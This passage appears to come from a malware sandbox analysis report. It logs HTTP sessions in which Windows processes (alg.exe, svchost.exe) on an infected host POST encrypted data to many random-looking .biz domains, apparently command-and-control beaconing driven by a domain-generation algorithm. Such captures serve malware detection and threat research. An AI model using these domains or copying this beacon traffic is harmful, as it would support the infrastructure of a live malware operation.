                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:52.714023113 CEST | 786 | OUT | Data Raw: 35 20 ae 45 2d 20 32 6a 06 03 00 00 5c ee f0 20 83 61 48 3c 44 cc 62 24 db 92 a7 77 fc fb 5e 4c 76 cd 4f 39 0f ce bc ec c5 d1 89 3b 39 65 ad 26 78 77 33 6c e6 b8 be 34 86 65 14 99 eb f6 2b e0 a1 6c 00 c5 67 f7 88 d2 d7 d4 a8 4b 02 b1 7d ba b8 59
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 5 E- 2j\ aH<Db$w^LvO9;9e&xw3l4e+lgK}Y,LH-{qj2n\h7.*hndU|3Dwz5iBnZT]vD~:KRYd,5n\Ew#^-[kMlH:Zmyt6.:bK8H;
Oct 8, 2024 15:28:53.452116013 CEST | 411 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=f94f97b7e512bbc6f76f2d7cd43ad3c4|8.46.123.33|1728394133|1728394133|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
50          192.168.2.4  49903        44.221.84.105   80                2912  C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Oct 8, 2024 15:28:53.320051908 CEST  349                OUT        POST /pyts HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:53.320067883 CEST  778                OUT        Data Raw: 5b aa f1 32 20 73 94 94 fe 02 00 00 48 bf 75 c5 ff 79 b8 ac 57 9a d0 9a 85 1c b7 68 2b 99 ae 16 05 3a f7 82 ea 7a 01 20 68 90 93 c0 28 06 cf 6a 9c 37 30 13 96 30 be e5 f3 b1 15 0b 4a 09 da 03 f0 13 dd 8a 0e df 23 40 31 82 39 ce ff 73 3b 1d 22 10
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: [2 sHuyWh+:z h(j700J#@19s;"x9`=CV!YfIF,jn)P:kP/,s:[=MT:V )P_,=VH@_PiR,m|5{[Hq!#[_`vKoP<h,i
Oct 8, 2024 15:28:53.785618067 CEST  411                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=dab213b9be6c78fdb1f33c425e6002b9|8.46.123.33|1728394133|1728394133|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
51          192.168.2.4  49905        208.100.26.245  80                4476  C:\Windows\SysWOW64\svchost.exe
Timestamp                            Bytes transferred  Direction  Data
Oct 8, 2024 15:28:53.522933006 CEST  351                OUT        POST /ovcqqvbb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:53.522933006 CEST  786                OUT        Data Raw: df 5f 71 b9 dc 2f f0 b1 06 03 00 00 9f 59 e5 67 bc 28 03 94 8c 81 b5 7c 21 e6 2a 60 1f 79 19 68 04 3a ba 81 85 41 b8 f9 15 72 78 c6 a9 7b dd 47 90 37 9d 39 c8 e3 25 d1 1a 5b aa 59 4d bd 91 3a 6d 44 94 11 89 93 c5 09 88 4c 48 57 3a 94 99 8b a0 dc
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: _q/Yg(|!*`yh:Arx{G79%[YM:mDLHW:O@dDgy5X*z+;@,SfV~YirrrSgx.B\cpahM1}P&5\7#}7`YC,G6@7l{I!7
Oct 8, 2024 15:28:54.124773026 CEST  744                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 8, 2024 15:28:54.207379103 CEST  348                OUT        POST /xphvd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:54.207379103 CEST  786                OUT        Data Raw: 04 ec 86 38 57 4a b2 25 06 03 00 00 cc c1 58 44 e5 2c b6 e8 04 0a bd 02 ea 07 21 73 76 e9 18 92 9b f2 ad af 44 29 35 4b 94 60 0f 1d 89 5b d7 39 db aa 21 b7 22 bb 23 75 27 d6 9a 88 33 f7 36 72 43 e1 1e 06 14 b0 21 d7 da 6f cc bf cb 83 61 01 14 b1
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 8WJ%XD,!svD)5K`[9!"#u'36rC!oa*1aY0q{_m~86s}:B"-JWjohr]7r{"&ecZPo&jj1Gx4Z .G%9P[_Qf
Oct 8, 2024 15:28:54.323559999 CEST  744                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49911 | 54.244.188.177 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:54.279133081 CEST | 350 | OUT | POST /hpbkng HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:54.279149055 CEST | 778 | OUT | Data Raw: 66 d8 35 f8 50 d1 5e 75 fe 02 00 00 51 a5 60 82 d5 34 bd f8 15 08 f3 9c 96 19 9a d6 11 87 98 0b e1 ab 80 d6 65 bb f2 ef c1 67 89 5c e6 9a 6e 2b 2a 78 52 63 09 f0 50 ce 7a 69 dd 0e 5f 53 98 c6 c8 d1 11 41 8d 73 c6 be 96 aa 26 e2 bc 74 4a 62 f2 ec
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: f5P^uQ`4eg\n+*xRcPzi_SAs&tJb>{x!Z#L{(%!,8J+"c'}z|`fjmg/v9GyapwP|W]G8z\=lqw!+tgh{8&I-*S
Oct 8, 2024 15:28:55.013617992 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=b9ca5fb82da818055ba3fd65e9368bf6|8.46.123.33|1728394134|1728394134|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49913 | 34.211.97.45 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:54.428262949 CEST | 349 | OUT | POST /qmkllgvo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:54.428284883 CEST | 786 | OUT | Data Raw: ff 29 ed cd d6 2f 75 a3 06 03 00 00 25 12 0b 60 59 7c 57 91 71 aa 29 ec 92 c5 1d 51 bb b6 b1 28 59 dc bc c9 e6 66 60 c7 6d e4 cb 5e 90 b3 14 87 7e a7 8f ac 7e 3d ae 22 c8 17 13 c3 60 22 97 ff 2e d0 34 36 dc 9f a1 12 83 84 29 4b 68 83 65 7d da 20
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: )/u%`Y|Wq)Q(Yf`m^~~="`".46)Khe} LEc=: Tt2)j.[RHn!d39R-HqhjBGt~`Rf$9&D"DUm:H.at`h#E7vk,e]Ci9Ck#?
Oct 8, 2024 15:28:55.171441078 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=22fdf5a88a6db6b590b7fef9a40ca619|8.46.123.33|1728394135|1728394135|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49919 | 54.244.188.177 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:55.289952993 CEST | 352 | OUT | POST /ouftojym HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:55.290518999 CEST | 786 | OUT | Data Raw: d1 5a 07 97 d2 4e 80 6b 06 03 00 00 d3 19 fb 19 4a 44 9e da 90 6c 64 9b 3f 9b 5c b5 f9 df d4 db 40 57 60 4d b6 1e 00 01 37 cf 9a ec 96 06 7b f6 e9 bf e7 e8 a9 b6 0f c4 5b a2 f8 b0 a0 4e ec f0 b7 fd f5 b6 20 e1 6a 1e e8 ff 37 95 1e 95 5a 99 7c 10
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ZNkJDld?\@W`M7{[N j7Z|Yfck/uKkt?>0(/%v^P>X9ue&$G@m'OcGVz0b{8|/fjLK8$"R|x,4kh^<>ZW.D\vQ<v{X.nW
Oct 8, 2024 15:28:56.010620117 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=6cf379045d64201f377e89d364100c00|8.46.123.33|1728394135|1728394135|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49920 | 35.164.78.200 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:55.317620993 CEST | 349 | OUT | POST /kaxtgyu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:55.317643881 CEST | 778 | OUT | Data Raw: d5 c9 f2 14 cc 80 40 1a fe 02 00 00 82 f4 51 aa b9 da 61 2b 6a 61 6c 6e 49 35 90 86 53 2a 76 4f ed 37 c1 47 8d b6 f3 77 41 03 1d 8c 74 ec 8c a8 a1 df d3 55 be 15 ed 78 ab 16 67 b7 07 24 10 06 f4 8c 9f a6 3d ea 2b 3e 31 97 4b 87 ef c5 69 77 d3 8a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: @Qa+jalnI5S*vO7GwAtUxg$=+>1Kiw8'<F#Aa-2wBd_TT I+`n*Ux$eLLZYQG 's1{ybGZ-3~\0zK3EK .A}*Ak*2.Vf
Oct 8, 2024 15:28:56.052648067 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=788d7726e8f21456a993a9576fca4f16|8.46.123.33|1728394135|1728394135|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49926 | 18.141.10.107 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:56.094455004 CEST | 344 | OUT | POST /h HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:56.094480038 CEST | 786 | OUT | Data Raw: 0a 00 23 15 d9 b1 ec 63 06 03 00 00 04 9c 41 a9 ca b3 71 99 2f 4a 01 ac f9 db ea 76 60 f7 86 85 0d 58 88 cd a7 25 3f 56 6d d1 45 a1 db e6 46 3f 73 c8 39 1a 5a a4 7e f6 8d d8 ea 33 7c fa c4 56 cc e0 04 9e cb 63 92 80 dc d1 00 8e b5 90 44 9f 05 f3
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: #cAq/Jv`X%?VmEF?s9Z~3|VcD}4b9X<Ve`y.7[|&INi"zdH,.RXz5j=~D]Vi0D"g[gH<T']A\n>){f(1AqbX"a


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49929 | 3.94.10.34 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:56.315296888 CEST | 356 | OUT | POST /dpntwbnivmh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:56.315315962 CEST | 778 | OUT | Data Raw: e2 27 3b 44 8a 04 64 ca fe 02 00 00 a2 25 f8 af 98 b9 95 5f 4c 8f 69 39 56 49 38 06 e9 f8 56 07 32 4b 54 c6 21 5e 6e 9e fb ec 93 5b cf 2f 46 bb cd aa de 85 3d 71 a9 4d 64 98 49 ea 74 50 2a fa c1 94 57 9e ef d9 db bb df ea 00 41 c0 1b b1 d4 7e e9
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ';Dd%_Li9VI8V2KT!^n[/F=qMdItP*WA~4>{/os&:kDSl-,{?`0"5o*FJSL()ae3O1ZmV:z@>v8FX8wsEH)RFZT+
Oct 8, 2024 15:28:56.791634083 CEST | 411 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=3125fd71c9ba5697c245a87867d01913|8.46.123.33|1728394136|1728394136|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49930 | 18.141.10.107 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:56.441497087 CEST | 359 | OUT | POST /mshoclxftgdlbsbo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:56.441510916 CEST | 786 | OUT | Data Raw: df 7a 45 80 ab 8a fd e2 06 03 00 00 a2 ef 50 19 21 0e 9b 22 fe ff b7 f6 c8 66 94 52 3e fc a1 f6 7d 69 fe 68 ea 08 d4 b2 ec ea e0 95 92 24 f0 7e be 6a 40 b6 76 43 46 0a fd 46 32 a4 15 c6 f3 58 3b cf 55 7f de 50 8d 55 01 99 33 e7 4a c7 f7 0d 6d 99
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: zEP!"fR>}ih$~j@vCFF2X;UPU3JmGn4_o70)F`i`\YoH?^5NSRoX]CX6WVzj8?PRVIdpO\9Sv?*X$_+KGwd.11
Oct 8, 2024 15:28:57.773281097 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=aaf1e0fc16dc15ae7f728d94f1d93a6a|8.46.123.33|1728394137|1728394137|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49937 | 165.160.15.20 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:57.108974934 CEST | 349 | OUT | POST /cxtsujgx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
